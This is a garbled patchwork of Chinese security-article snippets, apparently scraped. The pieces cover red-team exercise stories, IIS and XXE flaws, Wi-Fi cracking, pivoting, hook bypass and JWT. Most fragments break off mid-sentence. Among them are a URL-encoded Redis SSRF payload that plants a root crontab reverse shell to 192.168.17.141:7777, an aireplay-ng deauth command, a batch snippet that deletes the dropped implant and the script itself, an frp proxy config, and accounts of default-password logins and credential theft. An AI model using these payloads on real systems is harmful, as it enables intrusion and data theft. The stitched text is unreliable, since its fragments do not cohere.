大家好,我们是红日安全-Web安全攻防小组。 3.1 IIS 5.x/6.0解析漏洞 1、当创建.asp的文件目录的时候,在此目录下的任意文件,服务器都解析为asp文件。 _wcscmp(L".isa", (const wchar_t *)Extenisa)) ) JUMPOUT(loc_5A63FD89); ExtenExe = STRU:: _wcscmp(L".com", (const wchar_t *)ExtenCom)) ) JUMPOUT(loc_5A63FD89); ExtenMap = STRU:: 访问如图中的地址文件,可以看到上传成功: 5.
信息安全的关键因素是人,有人的地方就有江湖,江湖中避免不了攻防博弈,而博弈是攻防双方采用越来越新的技术进行较量的过程。对于国家、企事业单位甚至个人而言,守护安全防线,确保数据不遗失是最终目的。 而且,攻防演练活动自兴起以来,越来越常态化。但是,每年的这个时刻,都是攻防双方激烈博弈、尤为紧张的时刻。 ,可谓是神经紧绷、夜晚失眠、饭菜不香,真希望攻防演练的活动抓紧结束,避免自身丢分,被吊打的很惨。 图片众所周知,在攻防中为了牢固防线安全运营团队会部署安全防护工具、制定安全解决方案对防线进行实施保护。 而且,RASP技术集合BAS技术可以在攻防演练活动中实现自动化检测,对安全威胁进行验证,确保安全链路完整。正因此,RASP技术可以更好的在攻防演练中发挥作用,确保防线安全,避免防守方丢分。
就是上面能getshell的,还有另外一个web服务在8900,我们把两个源码都下载下来查看jdbc配置文件,可以找到数据库密码连接成功然后在对应的web服务的mysql中找到了对应的管理员密码和账号md5解密一下发现是弱口令发现他的权限是这样的 ,找一个管理员的登陆登陆成功到这里我们就已经拿到两个web服务的后台了然后又是一个文件上传直接getshell了命令执行5、总结getshell之后查了一下这家公司,刚好5000万资产,但是不是通用。
password>password</password></root> base64解码之后,拿到明文内容 尝试读取admin.php 用同样的方法的读取admin.php 解码之后看到了经过md5加密的密码 查阅资料后得知,由于站点是php的,所以下面的内容就是php的代码 5:找个php在线运行的网站 这里也有坑,不知道为什么,用菜鸟教程或者别的站点运行失败 但是使用https://www.dooccn.com 参考 [红日安全]Web安全Day8 – XXE实战攻防 浅谈XXE攻击 XXE漏洞利用技巧:从XML到远程代码执行 未知攻焉知防——XXE漏洞攻防 XXE从入门到放弃 浅谈XXE漏洞攻击与防御
Payload: http://172.19.0.2:6379/test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn0-59%200-23%201-31%201-12% 200-6%20root%20bash%20-c%20%27sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.17.141%2F7777%200%3E%261%27%5Cn %5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave
RTL-SDR、USRP、HackRF、及BladeRF等外设的价格下降,软件环境社区的完善,使现在对无线网络的研究已经不再像以前只能利用2.4GHz的无线网卡进行狭义的“无线”攻防。 (5) AP回应网卡AUTH包。 (6)无线终端向AP发送关联请求包Association Request数据包。 (7)AP向无线终端发送关联响应包Association Request数据包。 6 参考网站: https://my.oschina.net/u/1585857/blog/3420946 2)思路2-利用aireplay进行攻击:(实用性一般) aireplay-ng -0 5 [1]hash - cowpatty 选择[1] 使用抓取到的hash文件 选择[2] cowpatty 验证 (推荐用这个) 选择[1] 创建SSL证书 选择1] 断开原网络 (推荐) 5) 2) air去攻击5GHz,air攻击会导致对方无法连接5G网络! 五、实战例子(三) - Reaver 跑Pin码破解wifi 1、简介 PIN码共为8位,按431分段,总共穷举有11000种组合。
朋友们现在只对常读和星标的公众号才展示大图推送,建议大家把“亿人安全“设为星标”,否则可能就看不到了啦在某头部直辖市的攻防演练中,各家安全厂商投入了大量人力物力...而我方基本未做准备,只有小米加步枪, 且看如何不用0day如何连下数城前言几个月前打了一场某头部直辖市的攻防演练,演练当时通知的很急促,没做什么准备直接小米加步枪上阵了...在此过程中,很多个没用到0day的打点案例都很有意思,下面就简单分享一下案例一 RCE的话,历史上主要有“默认X-API-Key”和“Dashboard未授权访问”两个洞可以用过往挖某SRC的时候,就遇到过默认X-API-Key导致可直接创建执行lua代码的恶意路由的问题恰巧这次攻防演练中 难怪用不了使用该JWT,通过webpack提取到的api,访问后端API,拿下大量敏感信息,达千万量级,防止burp卡死,仅列出部分后言不断提升识别攻击面、利用攻击面的广度与深度,是一名hacker的核心素养攻防之中 ,拥有充足的经验,而又不陷入经验主义的迂腐,面对万难,而又不放弃思考,是出奇制胜的关键所在原文经过过文作者授权转载原文作者:奇安信攻防社区(J0o1ey)原文地址:https://forum.butian.net
文章首发于:奇安信攻防社区 https://forum.butian.net/share/1633 背景 记一次EDU攻防,来之前还是有点怂的,因为前段时间刚打了其它地方EDU感受了一波,小部分目标有重合好难打啊 第二天找c师傅看了一下也搞不上敲了这下咋办啊,设备有telnet、ping功能,看了下设备上路由表确定了有2、3、5、6网段,telnet测试了一波网段一头一尾的IP,根据端口开放情况确定了2网段都是些服务器 、3网段没法确定、5网段应该也是部分服务器段还有些无线ap设备。 通过telnet登陆到5网段的无线AP,可以执行部分命令,如ifconfig、ps -aux,其它命令都被屏蔽了,web界面比较简单没有什么功能,没有找到相关的漏洞。 总结 这次攻防整体的反思,外网打点信息收集尽量宽泛仔细一些,在现场打压力还是大的打不出来东西就是在坐牢,和队伍里师傅第一次协作不是很好没有沟通好打哪个目标好点,师傅第一次打也很懵逼,我打的多之前都是旁边辅助混子哈哈哈
时间 时间在22年护网结束之后,8月中旬左右,当时公司接了一个市级的攻防演练,作为实习生的我,有幸和师傅一起参加,也是我第一次以红队身份参加,当然,更多的还是蹭师傅的光 拿了第一有个感谢信(O(∩_∩ 端口开放: 成果五:某公司MongoDB未授权漏洞(空口令) 这个比较容易,fofa搜了下发现27017端口,遂尝试 成果六:某公司OA注入+任意文件上传 首先是某OA的注入获取shell 攻防开始前已经被上传马了 结尾 我也是第一次参加,虽然每边分到90多个url,但是一半多都是门户网站,一开始说内网可以打,过了一天又不让打了,当时因为cs的版本上线还有点问题纠结好久,然后星期五开始写报告就结束了这次攻防演练
现在我依稀记得大家在9月25日晚集体过年的场景,没想到的是:那tm只是开始 这一段时间一直在打攻防,重复、单调、无长进,希望早日脱离苦海吧 下面以攻防过程中的一段经历来展现一些有意思的tips ---- robots.txt C:\Users\admin\a.exe && C:\Users\admin\a.exe 还有很多,具体参照下面这篇文章 https://xz.aliyun.com/t/1649#toc-5 删除自解压程序 del /f /a /q %b% rem 删除马 del /f /a /q %0% rem 删除bat自身 0x05 内网渗透 我对于攻防比赛中的内网渗透是及其反感的 ,迫于得分,所以不得不去做一些体力活,但是这种东西做的再多也没有意义 frp 设置socks5代理并进行端口映射 公网vps frps.ini [common] bind_addr =0.0.0.0 bind_port server_port =7000 token = 9iathybNR7KL7EHd [socks_proxy] type = tcp remote_port =8010 plugin = socks5
文章首发于:奇安信攻防社区 https://forum.butian.net/share/1780 对前阵子的攻防演练比赛进行总结,分享一些个人的思路和方法 0x01 外网打点 资产发现 多测绘平台搜索 #google语法 site:*.edu.cn intext: vpn | 用户名 | 密码 | 帐号 | 默认密码 #github *.edu.cn password 在这次攻防演练里 123 test root 对于一些应用广泛的系统,可以通过google语法搜索其默认密码 这里通过sysadmin/1 成功登入泛微后台 nacos/nacos 常见漏洞利用 对于多目标的攻防演练 ,破解率较高 https://www.cmd5.com https://www.somd5.com 获取密码之后可以通过超级弱口令工具进行密码复用爆破,拿着获取的密码重新组合字典,对网段内的机器进行爆破 192.168.10.20 #非真实域控ip [->]AD [->]192.168.10.20 2、域内主机 DNS 一般就是域控地址 接着可以通过该机器是否开放53和389端口进行进一步确认 这次攻防演练的其中一个目标
云原生攻防矩阵: 云原生环境攻击路径的全景视图,清晰每一步采取的攻击技术。 目前,多个云厂商和安全厂商都已经梳理了多个针对容器安全的威胁矩阵,我们可以参考这些成熟的模型,结合个人对云原生安全的理解,构建自己的攻防矩阵。 然后通过不断的学习和实践,我们可以持续优化和补充这个攻防矩阵,从而有效提升对云原生环境的保护能力。 针对云原生环境的攻击技术,与传统的基于Windows和Linux的通用攻击技术有很大的不同,在这里,我们梳理了一个针对容器和K8s常见攻击技术的云原生攻防矩阵。 视频版:《云原生安全攻防》--云原生攻防矩阵
session的构造比较简单: 我们来看下线程最重要run中的内容: 内容不多,就是判断Socks4还是5并解析,之后是创建读写线程并start。 判断Socks4 还是 5: Socks代理至少三个字节的请求,第一个字节一定为5,如果是Socks4,则第一个字节一定为4。 parseSocks5和parseSocks4 为判断对应Socks的协议解析是否成功。 Reader: Writer: 读写部分是一些转发的常规操作。 实战攻防 在实战中使用可能会碰到一些特殊问题。 比如在浏览器中访问可以出现熟悉的"Georg says,'All seems fine'",说明可以正常访问。 这样我们才可以做到在这不断提升的攻防中稳步前行。
5、Restricted Admin Mode下pth 攻击只能适用于特定版本,限制还是比较多的,如果限制比较狠的内网(把135和445的流量都禁了),这个算是个突破手法吧。 static/361493062012010114020272/ https://medium.com/blue-team/preventing-mimikatz-attacks-ed283e7ebdd5
攻防演练简介 国家级攻防演练从2016年开始,已经走过了6个年头,它是由公安部组织的,这个网络安全攻防演练集结了国家顶级的攻防力量,以不限制手段、路径,进行获取权限并攻陷指定靶机为目的实战攻防演练。 攻防演练主要目标涵盖国家重要行业的关键信息基础设施、每年覆盖行业、单位、系统都在逐渐扩大。 这个攻防演练时间一般持续2到3周。一般护网演练都是在白天工作日进行,不过攻击方是不分时间点在尝试攻击。 防守方的防守要点: 1、限制报告数量,注重上报准确度; 2、明确非正常防守扣分要求; 3、设置加分上限; 4、强化追踪溯源重要性; 5、重视云、大、物、域控等管控权限;强调同等重要系统重要性。 小结 攻防演练过程中最关注的是权限和数据这两个点,基于对这两个点进行攻防。 通过每年的攻防演练可以促进安全发展: 强化安全保障,助力重大会议安保; 同业竞争排名,提高耽误业内声誉; 以赛代练,提升单位信息安全防护水平; 真枪实弹攻防,检验信息安全防护成效。
setuptools #安装python tools插件 4、从github下载watachAD服务器端源码 git clone https://github.com/0Kee-Team/WatchAD.git 5、 winlogbeat.yml文件,把内容都删除了,然后复制测试服务器上项目watchAD下winlogbat.yml文件覆盖该文件目录下; (4).以管理员身份打开PowerShell提示符; (5) docker-compose up 启动后,就可以访问WatchAD-Web前端页面了,地址:http://服务器ip/activity_timeline.html 0x05 WatchAD攻防实战 附:WatchAD攻防实战演示视屏 参考资料: 1、 https://www.cnblogs.com/backlion/p/13023599.html 2、 https://zhuanlan.zhihu.com /p/261740456 3、 https://mp.weixin.qq.com/s/7EH5jnF-rym0mI7sbGUUNg 4、 https://github.com/Qianlitp/WatchAD
虽然相比于修改函数地址更不易检测到,但是还是有技术手段能够进行修改函数代码的检测,本文就基于Inline hook来从防守方制定hook检测的策略和攻击方如何绕过hook检测两方面来浅谈hook技术的攻防 byJmpCode[1],0x90,PATCH_LENGTH-1); *(DWORD*)&byJmpCode[1] = (DWORD)NewMessageBox - (DWORD)dwHookAddress - 5; 我们知道在汇编里面进行跳转一般有两个硬编码,分别为E8和E9,E8即为call,E9即为jmp 短跳转:机器码为2个字节E8 XX,E8是call的硬编码,XX是跳转范围-128~127 长跳转:机器码为5个字节 ,我们首先用常规方式被hook,然后使用E8指令代替E9来实现了绕过hook的效果,作为蓝队人员也对检测机制进行了升级,在第二层hook攻防中,蓝方成员选择的是CRC/全代码校验。 PATCH_LENGTH_EP - 1); // 存储跳转地址 *(DWORD*)&byJmpCode[1] = (DWORD)NewExitProcess - (DWORD)dwHookAddressEP - 5;
Del 我们就可以将非空目录下的文件删除,让文件夹成为一个空目录 命令格式:del+路径+文件名(如果针对当前目录操作,可省略路径名,直接写上文件名) 3-14 3-21 3-28 4-18 4-25 5- 16 5-23 pgp加密 它还能对你的邮件加上数字签名从而使收信人可以确信邮件是你发来的。
一,stegano 分析题目:仔细观察水印No Flag Here! 说这里没有Flag,此地无银三百两,全选一下(ctrl+a)发现水印也可以被选中 将全选后的文档复制到记事本,发现出现一串BABA的格式,这样我们联想到了摩斯密码 B 换成 - A 换成 . 空格表示为 / -.-./---/-./--./.-./.--/..-/.-../.--/../---/-./.../--..--/..-./.-../.-/--./---.../.----/-./...-/.----/...../.-
使用JWK验证用户JWS Step 6:验证通过则正常响应 漏洞攻防 签名未校验 验证过程 JWT(JSON Web Token)的签名验证过程主要包括以下几个步骤: 分离解构:JWT的Header和Payload -YLk5gVLcuHRL25Fn_I5NghQbyzmISbulJ1CMq5WU-h9RA8IkYhVcrsP8Y1E2dc4fagKn5Tp60bUkjCcqIMAKouI-CX86mF0k3cSd340KuUXuf2vIo_yWMhZjFkAxj-gBn4eO3l2qZgyGkkHMn0HL8RSDzdG-BSBgNYoWs-w -YLk5gVLcuHRL25Fn_I5NghQbyzmISbulJ1CMq5WU-h9RA8IkYhVcrsP8Y1E2dc4fagKn5Tp60bUkjCcqIMAKouI-CX86mF0k3cSd340KuUXuf2vIo_yWMhZjFkAxj-gBn4eO3l2qZgyGkkHMn0HL8RSDzdG-BSBgNYoWs-w -YLk5gVLcuHRL25Fn_I5NghQbyzmISbulJ1CMq5WU-h9RA8IkYhVcrsP8Y1E2dc4fagKn5Tp60bUkjCcqIMAKouI-CX86mF0k3cSd340KuUXuf2vIo_yWMhZjFkAxj-gBn4eO3l2qZgyGkkHMn0HL8RSDzdG-BSBgNYoWs-w -YLk5gVLcuHRL25Fn_I5NghQbyzmISbulJ1CMq5WU-h9RA8IkYhVcrsP8Y1E2dc4fagKn5Tp60bUkjCcqIMAKouI-CX86mF0k3cSd340KuUXuf2vIo_yWMhZjFkAxj-gBn4eO3l2qZgyGkkHMn0HL8RSDzdG-BSBgNYoWs-w